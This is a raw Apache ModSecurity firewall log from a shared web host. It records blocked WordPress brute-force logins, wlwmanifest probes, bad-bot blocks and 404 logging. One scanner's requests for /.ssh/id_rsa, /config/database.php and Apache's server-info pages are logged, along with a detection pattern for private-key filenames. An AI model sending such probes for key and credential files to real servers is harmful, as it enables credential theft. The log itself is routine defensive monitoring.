[Tue May 26 19:11:45.615641 2026] [security2:error] [pid 18465:tid 18609] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjGU6GHndkguR9cLJ9_AAAAA4"]
[Tue May 26 19:11:46.641017 2026] [security2:error] [pid 18465:tid 18639] [client 102.203.209.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjGk6GHndkguR9cLJ-MwAAACs"]
[Tue May 26 19:11:47.754116 2026] [security2:error] [pid 18465:tid 18634] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjG06GHndkguR9cLJ-dgAAACY"]
[Tue May 26 19:11:49.650772 2026] [security2:error] [pid 18465:tid 18700] [client 14.236.186.234:38209] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjHE6GHndkguR9cLJ-wAAAAGg"], referer: https://anujtradingco.com
[Tue May 26 19:11:49.742810 2026] [security2:error] [pid 18465:tid 18663] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjHU6GHndkguR9cLJ-3AAAAEM"]
[Tue May 26 19:11:49.787930 2026] [security2:error] [pid 18465:tid 18546] [remote 74.91.224.220:36128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjHU6GHndkguR9cLJ-6QAAZFA"]
[Tue May 26 19:11:51.006565 2026] [security2:error] [pid 18465:tid 18642] [client 136.111.128.5:49858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.128.111.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vobre.eu"] [uri "/xmlrpc.php"] [unique_id "ahWjHk6GHndkguR9cLJ_MgAAAC4"]
[Tue May 26 19:11:51.183062 2026] [security2:error] [pid 18465:tid 18659] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjHk6GHndkguR9cLJ_JwAAAD8"]
[Tue May 26 19:11:51.233382 2026] [security2:error] [pid 18465:tid 18611] [client 136.111.128.5:51840] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWjH06GHndkguR9cLJ_PwAAABA"]
[Tue May 26 19:11:51.410875 2026] [security2:error] [pid 18465:tid 18595] [client 136.111.128.5:55883] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWjH06GHndkguR9cLJ_SgAAAAA"]
[Tue May 26 19:11:51.504485 2026] [security2:error] [pid 18465:tid 18558] [remote 74.91.224.220:36128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjH06GHndkguR9cLJ_TAAASFw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:51.546509 2026] [security2:error] [pid 18465:tid 18639] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjH06GHndkguR9cLJ_UAAAACs"], referer: https://www.anujtradingco.com/
[Tue May 26 19:11:51.650817 2026] [security2:error] [pid 18465:tid 18709] [client 136.111.128.5:58424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWjH06GHndkguR9cLJ_XAAAAHE"]
[Tue May 26 19:11:51.826195 2026] [security2:error] [pid 18465:tid 18640] [client 136.111.128.5:58885] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWjH06GHndkguR9cLJ_YQAAACw"]
[Tue May 26 19:11:52.040687 2026] [security2:error] [pid 18465:tid 18669] [client 136.111.128.5:62202] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIE6GHndkguR9cLJ_cgAAAEk"]
[Tue May 26 19:11:52.210591 2026] [security2:error] [pid 18465:tid 18628] [client 136.111.128.5:60110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIE6GHndkguR9cLJ_hAAAACA"]
[Tue May 26 19:11:52.213562 2026] [security2:error] [pid 18465:tid 18565] [remote 222.165.190.235:45228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjIE6GHndkguR9cLJ_bgAAGmM"]
[Tue May 26 19:11:52.323839 2026] [security2:error] [pid 18465:tid 18708] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjIE6GHndkguR9cLJ_hwAAAHA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287715&moderation-hash=91a889ac70362414dd8d3d7063359890
[Tue May 26 19:11:52.376599 2026] [security2:error] [pid 18465:tid 18614] [client 136.111.128.5:55055] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIE6GHndkguR9cLJ_kgAAABM"]
[Tue May 26 19:11:52.475510 2026] [security2:error] [pid 18465:tid 18675] [client 185.234.64.62:48236] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWjIE6GHndkguR9cLJ_kQAAAE8"]
[Tue May 26 19:11:52.678439 2026] [security2:error] [pid 18465:tid 18475] [remote 222.165.190.235:45228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjIE6GHndkguR9cLJ_mgAASgk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:52.731602 2026] [security2:error] [pid 18465:tid 18667] [client 136.111.128.5:55802] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIE6GHndkguR9cLJ_ogAAAEc"]
[Tue May 26 19:11:52.994340 2026] [security2:error] [pid 18465:tid 18685] [client 136.111.128.5:53128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIE6GHndkguR9cLJ_uQAAAFk"]
[Tue May 26 19:11:53.144285 2026] [security2:error] [pid 18465:tid 18690] [client 136.111.128.5:64415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIU6GHndkguR9cLJ_xQAAAF4"]
[Tue May 26 19:11:53.321077 2026] [security2:error] [pid 18465:tid 18606] [client 136.111.128.5:54232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vobre.eu"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWjIU6GHndkguR9cLJ_0wAAAAs"]
[Tue May 26 19:11:53.853802 2026] [security2:error] [pid 18465:tid 18603] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjIU6GHndkguR9cLJ_4wAAAAg"]
[Tue May 26 19:11:54.531972 2026] [security2:error] [pid 18465:tid 18611] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjIk6GHndkguR9cLKAIwAAABA"], referer: https://anujtradingco.com
[Tue May 26 19:11:54.987545 2026] [security2:error] [pid 18465:tid 18646] [client 18.193.252.127:62428] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWjIk6GHndkguR9cLKAPwAAADI"], referer: https://thegoodsporting.com
[Tue May 26 19:11:55.542963 2026] [security2:error] [pid 18465:tid 18628] [client 68.183.190.139:59730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWjI06GHndkguR9cLKAWgAAACA"]
[Tue May 26 19:11:55.867747 2026] [security2:error] [pid 18465:tid 18707] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjI06GHndkguR9cLKAYAAAAG8"]
[Tue May 26 19:11:57.200735 2026] [security2:error] [pid 18465:tid 18638] [client 68.183.190.139:59761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWjJU6GHndkguR9cLKAvQAAACo"]
[Tue May 26 19:11:57.381244 2026] [security2:error] [pid 18465:tid 18670] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjJE6GHndkguR9cLKAsAAAAEo"]
[Tue May 26 19:11:59.835460 2026] [security2:error] [pid 18465:tid 18688] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjJ06GHndkguR9cLKBNgAAAFw"]
[Tue May 26 19:12:01.209161 2026] [security2:error] [pid 18465:tid 18478] [remote 5.250.187.247:58888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjKU6GHndkguR9cLKBiQAAIAw"]
[Tue May 26 19:12:01.699703 2026] [security2:error] [pid 18465:tid 18641] [client 93.123.109.10:56972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/config/database.php"] [unique_id "ahWjKU6GHndkguR9cLKBywAAAC0"]
[Tue May 26 19:12:01.701762 2026] [security2:error] [pid 18465:tid 18721] [client 93.123.109.10:56758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWjKU6GHndkguR9cLKB0wAAAH0"]
[Tue May 26 19:12:01.706422 2026] [security2:error] [pid 18465:tid 18609] [client 93.123.109.10:56746] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/server-info"] [unique_id "ahWjKU6GHndkguR9cLKB1wAAAA4"]
[Tue May 26 19:12:01.759499 2026] [access_compat:error] [pid 18465:tid 18626] [client 93.123.109.10:56742] AH01797: client denied by server configuration: /home2/svijakqj/bhavisharchitects.com/server-status
[Tue May 26 19:12:01.874436 2026] [security2:error] [pid 18465:tid 18617] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjKU6GHndkguR9cLKBpAAAABU"]
[Tue May 26 19:12:03.493194 2026] [security2:error] [pid 18465:tid 18616] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjK06GHndkguR9cLKCOQAAABQ"]
[Tue May 26 19:12:05.912379 2026] [security2:error] [pid 18465:tid 18657] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjLU6GHndkguR9cLKCqQAAAD0"]
[Tue May 26 19:12:07.954749 2026] [security2:error] [pid 18465:tid 18606] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjL06GHndkguR9cLKDFQAAAAs"]
[Tue May 26 19:12:08.783012 2026] [security2:error] [pid 18465:tid 18525] [remote 51.89.129.65:51456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWjME6GHndkguR9cLKDWAAAXzs"]
[Tue May 26 19:12:08.783170 2026] [security2:error] [pid 18465:tid 18691] [client 51.89.129.65:51456] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWjME6GHndkguR9cLKDWAAAXzs"]
[Tue May 26 19:12:10.058970 2026] [security2:error] [pid 18465:tid 18595] [client 51.68.247.211:62236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahWjMk6GHndkguR9cLKDnwAAAAA"]
[Tue May 26 19:12:10.059081 2026] [security2:error] [pid 18465:tid 18595] [client 51.68.247.211:62236] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahWjMk6GHndkguR9cLKDnwAAAAA"]
[Tue May 26 19:12:10.236214 2026] [security2:error] [pid 18465:tid 18486] [remote 54.39.0.27:55236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahWjMk6GHndkguR9cLKDqgAAORQ"]
[Tue May 26 19:12:10.236422 2026] [security2:error] [pid 18465:tid 18653] [client 54.39.0.27:55236] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahWjMk6GHndkguR9cLKDqgAAORQ"]
[Tue May 26 19:12:10.301893 2026] [security2:error] [pid 18465:tid 18633] [client 77.68.83.86:61120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/images/images/cache.php"] [unique_id "ahWjMk6GHndkguR9cLKDrQAAACU"], referer: www.google.com
[Tue May 26 19:12:10.992000 2026] [security2:error] [pid 18465:tid 18612] [client 113.164.173.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjMk6GHndkguR9cLKDwAAAABE"]
[Tue May 26 19:12:11.439545 2026] [security2:error] [pid 18465:tid 18646] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjMk6GHndkguR9cLKD4gAAADI"]
[Tue May 26 19:12:11.518189 2026] [security2:error] [pid 18465:tid 18638] [client 148.113.130.141:40708] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "chettinadavenue.com"] [uri "/"] [unique_id "ahWjM06GHndkguR9cLKEAgAAACo"]
[Tue May 26 19:12:11.518295 2026] [security2:error] [pid 18465:tid 18638] [client 148.113.130.141:40708] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "chettinadavenue.com"] [uri "/"] [unique_id "ahWjM06GHndkguR9cLKEAgAAACo"]
[Tue May 26 19:12:11.738739 2026] [security2:error] [pid 18465:tid 18634] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjM06GHndkguR9cLKD8QAAACY"]
[Tue May 26 19:12:12.139502 2026] [security2:error] [pid 18465:tid 18471] [remote 141.95.202.18:52776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjM06GHndkguR9cLKEFgAAMAU"]
[Tue May 26 19:12:13.030756 2026] [security2:error] [pid 18465:tid 18586] [remote 141.95.202.18:52776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjNE6GHndkguR9cLKETAAAeXg"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:12:13.629070 2026] [security2:error] [pid 18465:tid 18583] [remote 147.47.107.157:59922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 157.107.47.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjNU6GHndkguR9cLKEaAAACXU"]
[Tue May 26 19:12:14.210023 2026] [security2:error] [pid 18465:tid 18589] [remote 147.47.107.157:59922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 157.107.47.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjNk6GHndkguR9cLKEjgAAeXs"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 19:12:14.333567 2026] [security2:error] [pid 18465:tid 18598] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjNU6GHndkguR9cLKEgAAAAAM"]
[Tue May 26 19:12:16.126451 2026] [security2:error] [pid 18465:tid 18687] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjN06GHndkguR9cLKE4gAAAFs"]
[Tue May 26 19:12:17.975973 2026] [security2:error] [pid 18465:tid 18632] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjOU6GHndkguR9cLKFQQAAACQ"]
[Tue May 26 19:12:18.952016 2026] [security2:error] [pid 18465:tid 18682] [client 51.68.111.199:35025] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWjOk6GHndkguR9cLKFhwAAAFY"]
[Tue May 26 19:12:18.952136 2026] [security2:error] [pid 18465:tid 18682] [client 51.68.111.199:35025] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWjOk6GHndkguR9cLKFhwAAAFY"]
